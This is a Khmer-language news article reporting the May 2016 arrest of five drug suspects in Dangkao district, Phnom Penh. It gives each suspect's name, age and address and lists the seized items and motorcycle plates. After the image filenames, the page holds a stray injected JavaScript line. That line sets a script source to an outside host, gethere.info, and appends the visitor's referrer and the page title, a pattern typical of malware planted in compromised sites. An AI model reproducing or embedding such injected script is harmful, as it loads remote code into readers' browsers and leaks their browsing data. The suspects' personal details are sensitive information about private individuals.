ព្រឹតិ្តការណ៍ថ្មីៗ

ជនសង្ស័យ៥នាក់ពាក់ព័ន្ធនិងគ្រឿងញៀនត្រូវកម្លាំងអាវុធហត្ថខណ្ឌដង្កោសហការជាមួយ កម្លាំងមន្ទីរប្រឆាំងបទល្មើសគ្រឿងញៀនឃាត់ខ្លួន

1 ឆ្នាំ មុន 0 តូ សុផល

ភ្នំពេញ៖ នៅវេលាម៉ោង១៤និង៣០នាទី ថ្ងៃទី២៦ ខែឧសភា ឆ្នាំ២០១៦ កម្លាំងអាវុធហត្ថខណ្ឌដង្កោសហការជាមួយ

កម្លាំងមន្ទីរប្រឆាំងបទល្មើសគ្រឿងញៀនកងរាជអាវុធហត្ថរាជធានីភ្នំពេញដោយមានការរាយការណ៍ពីបណ្តាញថានៅក្នុងបន្ទប់ជួលលេខ៤ មានការចែកចាយនិងប្រើប្រាស់គ្រឿងញៀនយ៉ាងសកម្មទើបកម្លាំងបានចុះប្រតិបត្តិការនិងឆែកឆេរក្នុងបន្ទប់ខាងលើ ដែល ស្ថិតក្នុងភូមិអន្លង់គងថ្មី សង្កាត់ព្រៃស ខណ្ឌដង្កោ រាជធានីភ្នំពេញ។ ដោយធ្វើការឃាត់ខ្លួនជនសង្ស័យចំនួន ០៥នាក់ដកហូត ម្សៅ ក្រាមពណ៍សថ្លាចំនួន ០២កញ្ចប់តូច ទូរស័ព្ទដៃចំនួន ០៧គ្រឿង កាបូបដៃចំនួន ០២ និងឧបករណ៍ប្រើប្រាស់គ្រឿងញៀនមួយចំនួន ម៉ូតូ០២គ្រឿង ម៉ាកទ្រីម C125ពណ៍ខ្មៅសេរីឆ្នាំ២០១២ ពាក់ស្លាកលេខ កណ្តាល1S.2371. មួយគ្រឿងទៀត ម៉ាកវីវ៉ា 110ពណ៍ខ្មៅ សេរីឆ្នាំ២០០៩ ពាក់ស្លាកលេខ តាកែវ.1D.3676.។

ជនសង្ស័យដែលឃាត់ខ្លួនរួមមាន÷
ទី១. ឈ្មោះ លីម បូប៊ី ភេទប្រុស អាយុ២៤ឆ្នាំស្នាក់នៅបន្ទប់ជួល ភូមិអន្លង់គងថ្មី សង្កាត់ព្រៃស ខណ្ឌដង្កោ រាជធានីភ្នំពេញ។
ទី២. ឈ្មោះ គឹម ពិសិដ្ឋ ភេទប្រុស អាយុ២៥ឆ្នាំស្នាក់នៅភូមិអន្លង់គងថ្មី សង្កាត់ព្រៃសរ ខណ្ឌដង្កោ រាជធានីភ្នំពេញ។
ទី៣. ឈ្មោះ ទូច ភក្តី ភេទប្រុស អាយុ២៥ឆ្នាំរស់នៅភូមិបុត្រតាជី សង្កាតព្រែកហូរ ក្រុងតាខ្មៅ ខេត្តកណ្តាល។
ទី៤. ឈ្មោះ ឆោម កន្និកា ភេទស្រី អាយុ២០ឆ្នាំ ស្នាក់នៅបន្ទប់ជួល ភូមិអន្លង់គងថ្មី សង្កាត់ព្រៃសរ ខណ្ឌដង្កោ រាជធានីភ្នំពេញ។
ទី៥. ឈ្មោះ ខៀវ បញ្ញា ភេទប្រុស អាយុ២៥ឆ្នាំរស់នៅភូមិខ្វា សង្កាត់ដង្កោ ខណ្ឌដង្កោ រាជធានីភ្នំពេញ។ ឃាត់ខ្លួននៅវេលាម៉ោង១៧និង០០នាទីមុខរោងចក្រតុក្កតា ស្ថិតក្នុងភូមិឃុំកើតហេតុខាងលើ។
ជនសង្ស័យទាំង ០៥នាក់គឺមានមុខរបរ ចែកចាយនិងប្រើប្រាស់គ្រឿងញៀន។
បច្ចុប្បន្នជនសង្ស័យទាំង០៥នាក់រួមទាំងវត្ថុតាងខាងលើត្រូវបានបញ្ជូនទៅមន្ទីរប្រឆាំងបទល្មើសគ្រឿងញៀនកងរាជអាវុធហត្ថរាជធានីភ្នំពេញដើម្បីចាត់ការតាមនីតិវិធីច្បាប់ ៕ ដោយ  អាត ចន្ទូ

13232960_542840332564883_8582478047932656775_n 13237593_542839995898250_7251601901332906853_n 13254067_542840085898241_5919848415982524672_n 13256437_542840039231579_5087254735545186616_n

11872305_10153513108267508_7760316066293043812_ophoto_2016-04-19_05-24-36bottom_ads_1TNN

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ